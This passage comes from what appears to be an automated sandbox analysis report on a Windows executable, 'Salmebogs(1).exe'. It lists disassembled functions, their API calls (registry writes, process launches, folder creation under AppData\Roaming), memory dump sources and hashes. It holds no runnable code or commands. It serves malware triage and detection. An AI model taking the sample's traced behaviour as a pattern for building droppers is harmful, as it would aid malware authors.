                                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,0040B5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040B5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CloseCreateValuelstrlen
                                                                        • String ID:
                                                                        • API String ID: 1356686001-0
                                                                        • Opcode ID: 9ef4235b4922e360298e28561e4c1430fa93c9f577f30df76f60a0902072e9d4
                                                                        • Instruction ID: 2eb3f179888eee6661223950110f5cf3924aaf9325c93c271646fcdba77cb0fe
                                                                        • Opcode Fuzzy Hash: 9ef4235b4922e360298e28561e4c1430fa93c9f577f30df76f60a0902072e9d4
                                                                        • Instruction Fuzzy Hash: 1411AE71E00108BFEB10AFA1DE89EAF767CEB44358F11403AF904B61D1DAB85E409768

                                                                        Control-flow Graph for the function starting at 401e66 (legend: Executed / Not Executed)
                                                                        APIs
                                                                          • Part of subcall function 0040518C: lstrlenW.KERNEL32(Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C4
                                                                          • Part of subcall function 0040518C: lstrlenW.KERNEL32(00403168,Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D4
                                                                          • Part of subcall function 0040518C: lstrcatW.KERNEL32(Completed,00403168,00403168,Completed,00000000,007953FF,762323A0), ref: 004051E7
                                                                          • Part of subcall function 0040518C: SetWindowTextW.USER32(Completed,Completed), ref: 004051F9
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040521F
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405239
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405247
                                                                          • Part of subcall function 0040570D: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 00405736
                                                                          • Part of subcall function 0040570D: CloseHandle.KERNEL32(?), ref: 00405743
                                                                        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 3585118688-0
                                                                        • Opcode ID: 4182218c851202a58554ce867b4190771bb8efdca3d2f608ac5fa283ef4d2969
                                                                        • Instruction ID: 0d84b1aa03f1a7237eec4328a6cc722d91751d385b027cc4a264b2ba126eb04a
                                                                        • Opcode Fuzzy Hash: 4182218c851202a58554ce867b4190771bb8efdca3d2f608ac5fa283ef4d2969
                                                                        • Instruction Fuzzy Hash: 2B116131900508EBCF21AF91CD4599E7AB6EF40354F20403BF905BA1E1D7798A929B9D

                                                                        Control-flow Graph for the function starting at 4015b9 (legend: Executed / Not Executed)
                                                                        APIs
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(?,?,007A4728,?,00405B00,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A9A
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405A9F
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405AB7
                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                          • Part of subcall function 0040565B: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040569E
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,?,00000000,000000F0), ref: 00401645
                                                                        Strings
                                                                        • C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede, xrefs: 00401638
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                        • String ID: C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede
                                                                        • API String ID: 1892508949-246221564
                                                                        • Opcode ID: d484a4ad1a9cf03a8d5b4845f460ea4f9df8045de8ff8018071d72647c5c6f44
                                                                        • Instruction ID: c84cbb424bb3084f93bd215551d43dceb81b994fc0f34687c4e9f979fa86e455
                                                                        • Opcode Fuzzy Hash: d484a4ad1a9cf03a8d5b4845f460ea4f9df8045de8ff8018071d72647c5c6f44
                                                                        • Instruction Fuzzy Hash: D711E631500504ABCF207FA4CD0099F3AA1EF54364B24093BFA06B61F1DA3D8E819E5D

                                                                        Control-flow Graph for the function starting at 40570d (legend: Executed / Not Executed)
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 00405736
                                                                        • CloseHandle.KERNEL32(?), ref: 00405743
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405720
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
                                                                        • Instruction ID: 36cb6700757ba35c499a420c30df9f69cdbb022eeaef0abc6502029d7df0636c
                                                                        • Opcode Fuzzy Hash: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
                                                                        • Instruction Fuzzy Hash: 2DE0B6F4600209BFEB10AB64ED49E7B7AACEB48605F018525BD50F2190D7B998148A78
                                                                        APIs
                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
                                                                        • Instruction ID: 1204d1a220e6d768f3d461a9159a4fc95a2ffbde449ffc0b80a50a9695adc5d2
                                                                        • Opcode Fuzzy Hash: e797fdd055ba3fb9280d5808d55a1efa047aea8eb91472c6f5c2936704595438
                                                                        • Instruction Fuzzy Hash: 4E01D132624210ABE7095B389D04B6A3698E751315F10CA3BB851F66F1DA7C8C428B4C
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 0040526F
                                                                          • Part of subcall function 0040413D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
                                                                        • CoUninitialize.COMBASE(00000404,00000000), ref: 004052BB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeMessageSendUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2896919175-0
                                                                        • Opcode ID: d4a5eda30783c5f32a6eef6d3db55172bfb61ae871ec4e49a63d24e9d9f7b7cc
                                                                        • Instruction ID: 07fe8937bb0382fb0b6d536153df17722968a955825c4abcd3168338cebd822e
                                                                        • Opcode Fuzzy Hash: d4a5eda30783c5f32a6eef6d3db55172bfb61ae871ec4e49a63d24e9d9f7b7cc
                                                                        • Instruction Fuzzy Hash: 17F0FA73400A009BE7811754AE05B27B3A4EFD1309F04C07FEE88B62A0CA7C4840CF5E
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,004032E6,00000009), ref: 00406419
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406434
                                                                          • Part of subcall function 00406397: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063AE
                                                                          • Part of subcall function 00406397: wsprintfW.USER32 ref: 004063E9
                                                                          • Part of subcall function 00406397: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2547128583-0
                                                                        • Opcode ID: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                        • Instruction ID: e585cff6f5786af6166c4577b0086b93443bcdd3738d69eb1d3bc5833b741c46
                                                                        • Opcode Fuzzy Hash: 82069e22af83b56f915537a5bbc2862a2b5ba3ad8f84c774fb382a69f2dcb8e0
                                                                        • Instruction Fuzzy Hash: 40E08C32604220AAD2119B749E8493B66A8AE99740302043FF946F2080DB78EC329AAD
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(00000003,00402E2E,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C06
                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C28
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                        • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                        • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                        • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                        APIs
                                                                        • GetFileAttributesW.KERNELBASE(?,?,004057E2,?,?,00000000,004059B8,?,?,?,?), ref: 00405BE2
                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                        • Instruction ID: 8fdcebde4214434899a3f1b003f07ebd3e102d67d4793912b01b2ec481300f1c
                                                                        • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                        • Instruction Fuzzy Hash: 22D0C972904520ABC2102728AE0889BBF65EB542717024B35FAA9A22B0CB304C569A98
                                                                        APIs
                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403270,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 004056DE
                                                                        • GetLastError.KERNEL32 ref: 004056EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1375471231-0
                                                                        • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                        • Instruction ID: b0cc9022c7fc522e2a1325a3a88c93622829811feb2dde411d36191549599a95
                                                                        • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                        • Instruction Fuzzy Hash: B3C04C70615602DAE6105B20DE1971B7954AB50741F51883A614AE11A0DA758455DE2E
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403232,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405C99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                        • Instruction ID: 1f5957c0360fd8fa5667ae66c631dc737c687ff57a2230ad484cb91cc4d73fb5
                                                                        • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                        • Instruction Fuzzy Hash: E7E08C3220421AABEF109E618C00AEB7B6CEF05364F004436F922E2140E234E8218BA8
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031E8,00000000,0078B6D8,000000FF,0078B6D8,000000FF,000000FF,00000004,00000000), ref: 00405CC8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                        • Instruction ID: 98013b39db6e85760f5ab21dfedcc60362cbd5470676cd53f11b5d229ee65248
                                                                        • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                        • Instruction Fuzzy Hash: A0E0463221425AABEF109E508C00AAB3B6CEB00261F104432B915E6040E630E961ABA8
                                                                        APIs
                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: e1995a9e833a58539b7e44c60ab8e2d08775019d7d80c7276fb4523c6d485d87
                                                                        • Instruction ID: 204b984327d7f3e6c4152ed8a6035fe7395a45412b5aca2fcc5e3a71fd3ba684
                                                                        • Opcode Fuzzy Hash: e1995a9e833a58539b7e44c60ab8e2d08775019d7d80c7276fb4523c6d485d87
                                                                        • Instruction Fuzzy Hash: B7D05B33704100DBCB10DFE89E0869D77759B80334B20C177D501F25D4D6B8C5505B1D
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
                                                                        • Instruction ID: e107f78b1bc9bc3d7278e4c5f459ebf6569cc91abc8b2cca8897f7623fe5a1fb
                                                                        • Opcode Fuzzy Hash: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
                                                                        • Instruction Fuzzy Hash: 97C09BB1744701BBDB109B509D4DF17775D6794700F1584297350F61D4D674E450D61D
                                                                        APIs
                                                                        • SendMessageW.USER32(00000028,?,00000001,00403F52), ref: 00404134
                                                                        Memory Dump Source
